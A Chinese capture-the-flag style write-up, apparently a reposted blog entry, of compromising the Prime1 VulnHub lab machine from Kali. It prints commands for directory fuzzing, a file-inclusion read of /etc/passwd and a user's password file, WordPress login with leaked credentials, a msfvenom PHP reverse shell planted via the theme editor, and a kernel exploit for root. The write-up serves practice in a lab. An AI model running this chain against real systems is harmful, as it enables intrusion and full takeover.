我的编程空间,编程开发者的网络收藏夹
学习永远不晚

kali渗透之从0到root的操作系统渗透全过程

短信预约 -IT技能 免费直播动态提醒
省份

北京

  • 北京
  • 上海
  • 天津
  • 重庆
  • 河北
  • 山东
  • 辽宁
  • 黑龙江
  • 吉林
  • 甘肃
  • 青海
  • 河南
  • 江苏
  • 湖北
  • 湖南
  • 江西
  • 浙江
  • 广东
  • 云南
  • 福建
  • 海南
  • 山西
  • 四川
  • 陕西
  • 贵州
  • 安徽
  • 广西
  • 内蒙
  • 西藏
  • 新疆
  • 宁夏
  • 兵团
手机号立即预约

请填写图片验证码后获取短信验证码

看不清楚,换张图片

免费获取短信验证码

kali渗透之从0到root的操作系统渗透全过程

目录

攻击机

靶机

扫目录

根据提示进行fuzz:模糊测试

尝试wordpress

接下进行注入,在主题编辑器里进行写入木马

提权


注:以下内容仅供学习,请勿用于非法途径

攻击机

kali

靶机

prime1

链接: https://pan.baidu.com/s/1DEXUTVoRNhaYw_CqNzEqow?pwd=4bm5 提取码: 4bm5

或者直接去vulnhub.com下载,里面有各类镜像

首先进入靶机

发现什么都没有

扫目录

dirb 目标域名

dirb 目标域名 -X .txt,.php,.zip(过滤)

分别访问这几个地址,发现提示

根据提示进行fuzz:模糊测试

fuzz的功能有

  1. 目录扫描

  2. 找参数

  3. 密码爆破 username password

  4. 找SQL,XSS

  5. 压力测试

kali有自带(-w 指定字典路径)

wfuzz -w http://192.168.0.x/index.php?FUZZ(正常扫描)

wfuzz -w --hw 12 http://192.168.0.x/index.php?FUZZ(过滤扫描)

wfuzz -w /usr/share/wordlists/dirb/common.txt --hw 12 http://192.168.0.103/index.php?FUZZ

file?推测是文件包含,然后记得之前的提示

所以file=location.txt

http://192.168.0.103/index.php?file=location.txt

根据提示进一步深入

http://192.168.0.103/image.php?secrettier360=/etc/passwd

:find password.txt file in my directory:/home/saket

进一步深入

http://192.168.0.103/image.php?secrettier360=/home/saket/password.txt

疑似的密码

follow_the_ippsec

所以22端口这里可能不行,换一条线

尝试wordpress

http://192.168.0.103/wordpress/

可以通过author=?来确定用户名

或者直接用wpscan进行扫描得到用户名

wpscan --url xxx --enumerate u(专门扫描wordpress的)

wpscan --url http://192.168.0.103/wordpress --enumerate u

用刚刚得到的密码和用户进行登录

Victor

follow_the_ippsec

接下进行注入,在主题编辑器里进行写入木马

一个个试最后发现在这里可以写入

利用MSF生成木马

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -o shell

.php

复制,主要不要把开头的/*复制进去,粘贴到WP

启动监听

开始连接

http://192.168.0.103/wordpress/wp-content/themes/twentynineteen/secret.php

成功建立会话

提权

查找刚刚扫出来的版本是否存在可利用漏洞

msf6 > searchsploit 16.04 Ubuntu

编译好文件然后上传进行提权

cp /usr/share/exploitdb/exploits/linux/local/45010.c ./

编译用gcc

gcc 45010.c -o 45010

利用msf上传到tmp目录,因为tmp 任何一个目录都可以执行权限

meterpreter > upload /root/45010 /tmp/45010

进入shell进行加权和执行

cd /tmp

chmod +x 45010

./45010

来源地址:https://blog.csdn.net/m0_56988395/article/details/123092285

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

kali渗透之从0到root的操作系统渗透全过程

下载Word文档到电脑,方便收藏和打印~

下载Word文档

猜你喜欢

透视服务器操作系统安全升级背后的秘密:从原理到实践

服务器操作系统安全升级是一项复杂且重要的任务,涉及到诸多原理和实践。本文将深入探讨服务器操作系统安全升级背后的秘密,从原理到实践,全方位揭示安全升级的奥秘。
透视服务器操作系统安全升级背后的秘密:从原理到实践
2024-02-07

编程热搜

目录